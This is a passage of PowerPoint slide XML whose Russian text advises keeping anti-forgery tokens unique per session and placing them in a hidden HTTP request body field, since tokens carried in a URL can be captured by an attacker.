                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" b="1" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>-</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запрос</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" b="1" spc="5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>е</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="-5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Такие</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU"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токены должны</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="-4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быть</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="-2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уни</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="5" dirty="0">
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>к</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>альными</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="-7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как</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="-1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минимум</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="-4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для</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каждой</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="-3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с</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="5" dirty="0">
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>е</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>сси</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="10" dirty="0">
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>и</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="1800" dirty="0">
              <a:effectLst/>
              <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="359410" marR="36830" indent="-285750" algn="just">
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Же</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="-5" dirty="0">
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>л</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="5" dirty="0">
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>а</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>тельно</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU"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до</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="-5" dirty="0">
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>б</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>авлять</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="2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т</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="5" dirty="0">
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>о</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>кен</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="5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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="75" dirty="0">
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" b="1" dirty="0">
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>ск</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" b="1" spc="5" dirty="0">
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>р</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" b="1" dirty="0">
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>ыт</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" b="1" spc="5" dirty="0">
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>о</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" b="1" dirty="0">
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>е</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" b="1" spc="30" dirty="0">
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" b="1" dirty="0">
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>поле</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" b="1" spc="50" dirty="0">
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" b="1" dirty="0">
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>тела</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" b="1" spc="50" dirty="0">
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" b="1" spc="-5" dirty="0">
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" b="1" dirty="0">
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>запроса</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>, ч</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обы</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="5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избежать</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="3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его использова</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="5" dirty="0">
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>н</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>ия</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="-7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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="-5" dirty="0">
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="1800" dirty="0">
              <a:effectLst/>
              <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="359410" marR="36195" indent="-285750" algn="just">
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Токен</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU"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можно</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU"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включать</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="-1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4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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="35" dirty="0">
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="1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но</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="3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это</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ув</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>е</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="-5" dirty="0">
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>л</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="5" dirty="0">
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>и</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>чив</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="5" dirty="0">
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>а</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>ет</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р</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5" dirty="0">
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>с</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>к,</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ч</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о</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="3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та</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="5" dirty="0">
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>к</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>ой</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="15" dirty="0">
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" spc="2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будет</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получен злоумышленником,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="-10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5"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о</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="5" dirty="0">
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>ке</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>н</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="-3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может</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="-35"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быт</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>ь</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="-3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5" dirty="0">
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>с</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>п</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="5" dirty="0">
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>о</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="-5" dirty="0">
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>л</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>ьзован</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="-6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 ат</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="5" dirty="0">
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>а</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>ке.</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="1800" dirty="0">
              <a:effectLst/>
